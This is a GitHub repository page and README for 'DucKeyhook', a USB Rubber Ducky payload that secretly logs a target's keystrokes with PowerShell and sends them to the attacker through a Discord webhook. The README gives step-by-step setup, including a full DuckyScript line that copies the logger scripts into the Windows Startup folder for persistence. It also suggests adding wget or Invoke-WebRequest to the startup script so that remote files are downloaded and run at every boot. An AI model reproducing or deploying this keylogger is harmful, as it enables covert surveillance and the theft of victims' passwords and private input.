Skip to content

InfinityTeq/DucKeyhook

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

22 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
c.cmd
c.cmd
 
 
l.ps1
l.ps1
 
 
p.ps1
p.ps1
 
 
payload.txt
payload.txt
 
 
uninstaller.cmd
uninstaller.cmd
 
 

Repository files navigation

DucKeyhook

Chris Taylor [Blue Cosmo]

      :::::::::  :::    :::  ::::::::  :::    ::: :::::::::: :::   ::: :::    :::  ::::::::   ::::::::  :::    ::: 
     :+:    :+: :+:    :+: :+:    :+: :+:   :+:  :+:        :+:   :+: :+:    :+: :+:    :+: :+:    :+: :+:   :+:   
    +:+    +:+ +:+    +:+ +:+        +:+  +:+   +:+         +:+ +:+  +:+    +:+ +:+    +:+ +:+    +:+ +:+  +:+     
   +#+    +:+ +#+    +:+ +#+        +#++:++    +#++:++#     +#++:   +#++:++#++ +#+    +:+ +#+    +:+ +#++:++       
  +#+    +#+ +#+    +#+ +#+        +#+  +#+   +#+           +#+    +#+    +#+ +#+    +#+ +#+    +#+ +#+  +#+       
 #+#    #+# #+#    #+# #+#    #+# #+#   #+#  #+#           #+#    #+#    #+# #+#    #+# #+#    #+# #+#   #+#       
#########   ########   ########  ###    ### ##########    ###    ###    ###  ########   ########  ###    ###

Overview:

DucKeyhook is a USB RubberDucky payload that uses PowerShell to log keystrokes. It will send the logs to you via discord. The keylogger almost gives you a "live feed" of their keystrokes through discord. However, you can tweak the timing to get the logs sent to you quick

  • moves c.cmd file to windows startup directory
  • c.cmd will secretly run p.ps1
  • p.ps1 will log keystrokes
  • l.ps1 will execute p.ps1 every minue
    • this can be changed to a preferred delay
  • uninstaller.cmd uninstalls the payload from the target computer

Resources:

Requirements:

  • Twin-Duck firmware
  • Discord Webhook
  • Windows Target

Instructions:

Create Discord Webhook

  1. create a discord server by clicking the plus button in the bottom left

Create Server

  1. go into the integrations section in the server's settings

  2. click Webhooks Integrations

  3. create a new webhook by clicking New Webhook

  4. click Copy Webhook URL to copy the webhook URL Webhook

Set-Up/Installation

  1. in line 5 of p.ps1, replace DISCORDWEBHOOK with the webhook URL
$webhook = "DISCORDWEBHOOK"
  1. in line 16 payload.txt, change 'L' to the name of your microSD card
STRING $u=gwmi Win32_Volume|?{$_.Label -eq'L'}|select name;cd $u.name;cp .\p.ps1 $env:temp;cp .\l.ps1 $env:temp;cp .\c.cmd "C:/Users/$env:UserName/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup";cd $env:temp;echo "">"$env:UserName.log";
  1. flash Twin-Duck firmware on to your duck
  2. load, encode, and deploy!!

Log Sending Delay

Changing the delay between log sends

  1. in line 12 of l.ps1, change 60 to your preferred number of seconds
Start-Sleep 60

Extraneous:

The c.cmd attack opportunity

the c.cmd file runs every startup.
this means an attacker could place a
'wget' or 'Invoke-WebRequest' and have a file
be downloaded from anywhere on the internet onto the computer.
the file would then save in the startup directory,
allowing it to run every startup

About

a powershell keylogger powered by the USB Rubber Ducky that uses discord webhooks to send the logs back to our us.

Resources

Readme

License

View license
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages